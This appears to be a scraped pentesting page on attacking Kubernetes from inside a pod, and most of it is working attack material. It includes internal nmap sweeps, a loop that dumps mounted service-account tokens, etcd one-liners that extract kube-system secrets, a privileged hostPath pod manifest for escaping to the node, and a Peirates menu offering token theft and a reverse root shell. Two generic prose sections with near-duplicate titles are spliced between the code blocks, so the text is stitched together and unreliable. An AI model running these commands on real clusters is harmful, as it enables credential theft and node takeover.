Attacking Kubernetes from inside a Pod

kubectl get svc --all-namespaces

sudo apt-get update
sudo apt-get install nmap
nmap-kube ()
{
nmap --open -T4 -A -v -Pn -p 80,443,2379,8080,9090,9100,9093,4001,6782-6784,6443,8443,9099,10250,10255,10256 "${@}"
}

nmap-kube-discover () {
local LOCAL_RANGE=$(ip a | awk '/eth0$/{print $2}' | sed 's,[0-9][0-9]*/.*,*,');
local SERVER_RANGES=" ";
SERVER_RANGES+="10.0.0.1 ";
SERVER_RANGES+="10.0.1.* ";
SERVER_RANGES+="10.*.0-1.* ";
nmap-kube ${SERVER_RANGES} "${LOCAL_RANGE}"
}
nmap-kube-discover

stress-ng --vm 2 --vm-bytes 2G --timeout 30s

kubectl --namespace big-monolith top pod hunger-check-deployment-xxxxxxxxxx-xxxxx

ps -ef | grep kubelet
root        1406       1  9 11:55 ?        00:34:57 kubelet --cloud-provider=aws --cni-bin-dir=/opt/cni/bin --cni-conf-dir=/etc/cni/net.d --config=/etc/kubernetes/kubelet-conf.json --exit-on-lock-contention --kubeconfig=/etc/kubernetes/kubelet-kubeconfig --lock-file=/var/run/lock/kubelet.lock --network-plugin=cni --container-runtime docker --node-labels=node.kubernetes.io/role=k8sworker --volume-plugin-dir=/var/lib/kubelet/volumeplugin --node-ip 10.1.1.1 --hostname-override ip-1-1-1-1.eu-west-2.compute.internal

# Check Kubelet privileges
kubectl --kubeconfig /var/lib/kubelet/kubeconfig auth can-i create pod -n kube-system

# Steal the tokens from the pods running in the node
# The most interesting one is probably the one of kube-system
ALREADY="IinItialVaaluE"
for i in $(mount | sed -n '/secret/ s/^tmpfs on \(.*default.*\) type tmpfs.*$/\1\/namespace/p'); do
TOKEN=$(cat $(echo $i | sed 's/.namespace$/\/token/'))
if ! [ $(echo $TOKEN | grep -E $ALREADY) ]; then
ALREADY="$ALREADY|$TOKEN"
echo "Directory: $i"
echo "Namespace: $(cat $i)"
echo ""
echo $TOKEN
echo "================================================================================"
echo ""
fi
done

./can-they.sh -i "--list -n default"
./can-they.sh -i "list secrets -n kube-system"// Some code

kubectl get nodes
NAME                STATUS   ROLES    AGE   VERSION
k8s-control-plane   Ready    master   93d   v1.19.1
k8s-worker          Ready    <none>   93d   v1.19.1

root@k8s-control-plane:/var/lib/etcd/member/wal# ps -ef | grep etcd | sed s/\-\-/\\n/g | grep data-dir

## Attacking Kubernetes from Inside a Pod

### Introduction

In a Kubernetes cluster, if an attacker gains access to a pod, they can potentially escalate their privileges to gain control over the entire cluster. This section explores various techniques that can be used by an attacker to compromise a Kubernetes cluster from inside a pod.

### Techniques

1. **Accessing the Kubernetes API Server**: An attacker with access to a pod can try to access the Kubernetes API server using service account tokens mounted inside the pod.

2. **Pod Escape**: Attackers can attempt to break out of the pod's container to gain access to the host node and potentially other pods running on the same node.

3. **Network Sniffing**: By sniffing network traffic within the pod, an attacker can intercept sensitive information such as API requests and credentials.

4. **Pod Resource Exhaustion**: Attackers can consume excessive resources within a pod to cause a denial of service (DoS) attack, impacting other pods in the cluster.

### Mitigations

To prevent attacks from inside a pod, consider implementing the following mitigations:

- **Restrict Pod Permissions**: Limit the permissions assigned to pods to reduce the impact of a compromised pod.

- **Network Policies**: Implement network policies to restrict pod-to-pod communication and limit the attack surface.

- **Pod Security Policies**: Enforce security policies to control the actions that pods can perform, such as accessing the host node or other pods.

By understanding these attack techniques and implementing appropriate mitigations, organizations can enhance the security of their Kubernetes clusters.

data-dir=/var/lib/etcd

strings /var/lib/etcd/member/snap/db | less

db=`strings /var/lib/etcd/member/snap/db`; for x in `echo "$db" | grep eyJhbGciOiJ`; do name=`echo "$db" | grep $x -B40 | grep registry`; echo $name \| $x; echo; done

db=`strings /var/lib/etcd/member/snap/db`; for x in `echo "$db" | grep eyJhbGciOiJ`; do name=`echo "$db" | grep $x -B40 | grep registry`; echo $name \| $x; echo; done | grep kube-system | grep default

## Attacking Kubernetes from Inside a Pod

### Introduction

When an attacker gains access to a Kubernetes pod, either through a compromised container or by exploiting a vulnerability, they can leverage this access to further compromise the Kubernetes cluster. This article explores various techniques that an attacker can use to escalate privileges and move laterally within the cluster from inside a pod.

### Privilege Escalation

#### Exploiting Misconfigured RBAC Roles

If the pod's service account has overly permissive Role-Based Access Control (RBAC) roles assigned to it, an attacker can abuse these privileges to perform unauthorized actions within the cluster. By exploiting misconfigured RBAC roles, an attacker can gain additional permissions and potentially take control of the entire cluster.

#### Accessing the Kubernetes API Server

Once inside a pod, an attacker can attempt to access the Kubernetes API server using tools like `kubectl` or by sending direct API requests. If successful, the attacker can interact with the API server to gather sensitive information, modify resources, or deploy malicious workloads.

### Lateral Movement

#### Pod Hopping

An attacker can move laterally within the cluster by compromising multiple pods. By exploiting vulnerabilities or misconfigurations in other pods, the attacker can pivot from one pod to another, gradually expanding their control and influence over the cluster.

#### Node Compromise

If the attacker can escalate their privileges to the node level, they can potentially compromise the entire node and all the pods running on it. This can provide the attacker with a significant foothold in the cluster and enable them to carry out more extensive attacks.

### Conclusion

Securing Kubernetes clusters requires not only protecting the external attack surface but also considering the threats that can originate from within the cluster. By understanding how attackers can exploit vulnerabilities from inside a pod, organizations can better defend against internal threats and secure their Kubernetes deployments.

1/registry/secrets/kube-system/default-token-d82kb | eyJhbGciOiJSUzI1NiIsImtpZCI6IkplRTc0X2ZP[REDACTED]

apiVersion: v1
kind: Pod
metadata:
name: bad-priv2
namespace: kube-system
spec:
containers:
- name: bad
hostPID: true
image: gcr.io/shmoocon-talk-hacking/brick
stdin: true
tty: true
imagePullPolicy: IfNotPresent
volumeMounts:
- mountPath: /chroot
name: host
securityContext:
privileged: true
volumes:
- name: host
hostPath:
path: /
type: Directory

Peirates v1.1.8-beta by InGuardians
https://www.inguardians.com/peirates
----------------------------------------------------------------
[+] Service Account Loaded: Pod ns::dashboard-56755cd6c9-n8zt9
[+] Certificate Authority Certificate: true
[+] Kubernetes API Server: https://10.116.0.1:443
[+] Current hostname/pod name: dashboard-56755cd6c9-n8zt9
[+] Current namespace: prd
----------------------------------------------------------------
Namespaces, Service Accounts and Roles |
---------------------------------------+
[1] List, maintain, or switch service account contexts [sa-menu]  (try: listsa *, switchsa)
[2] List and/or change namespaces [ns-menu] (try: listns, switchns)
[3] Get list of pods in current namespace [list-pods]
[4] Get complete info on all pods (json) [dump-pod-info]
[5] Check all pods for volume mounts [find-volume-mounts]
[6] Enter AWS IAM credentials manually [enter-aws-credentials]
[7] Attempt to Assume a Different AWS Role [aws-assume-role]
[8] Deactivate assumed AWS role [aws-empty-assumed-role]
[9] Switch authentication contexts: certificate-based authentication (kubelet, kubeproxy, manually-entered) [cert-menu]
-------------------------+
Steal Service Accounts   |
-------------------------+
[10] List secrets in this namespace from API server [list-secrets]
[11] Get a service account token from a secret [secret-to-sa]
[12] Request IAM credentials from AWS Metadata API [get-aws-token] *
[13] Request IAM credentials from GCP Metadata API [get-gcp-token] *
[14] Request kube-env from GCP Metadata API [attack-kube-env-gcp]
[15] Pull Kubernetes service account tokens from kops' GCS bucket (Google Cloudonly) [attack-kops-gcs-1]  *
[16] Pull Kubernetes service account tokens from kops' S3 bucket (AWS only) [attack-kops-aws-1]
--------------------------------+
Interrogate/Abuse Cloud API's   |
--------------------------------+
[17] List AWS S3 Buckets accessible (Make sure to get credentials via get-aws-token or enter manually) [aws-s3-ls]
[18] List contents of an AWS S3 Bucket (Make sure to get credentials via get-aws-token or enter manually) [aws-s3-ls-objects]
-----------+
Compromise |
-----------+
[20] Gain a reverse rootshell on a node by launching a hostPath-mounting pod [attack-pod-hostpath-mount]
[21] Run command in one or all pods in this namespace via the API Server [exec-via-api]
[22] Run a token-dumping command in all pods via Kubelets (authorization permitting) [exec-via-kubelet]
-------------+
Node Attacks |
-------------+
[30] Steal secrets from the node filesystem [nodefs-steal-secrets]
-----------------+
Off-Menu         +
-----------------+
[90] Run a kubectl command using the current authorization context [kubectl [arguments]]
[] Run a kubectl command using EVERY authorization context until one works [kubectl-try-all [arguments]]
[91] Make an HTTP request (GET or POST) to a user-specified URL [curl]
[92] Deactivate "auth can-i" checking before attempting actions [set-auth-can-i]
[93] Run a simple all-ports TCP port scan against an IP address [tcpscan]
[94] Enumerate services via DNS [enumerate-dns] *
[]  Run a shell command [shell <command and arguments>]

[exit] Exit Peirates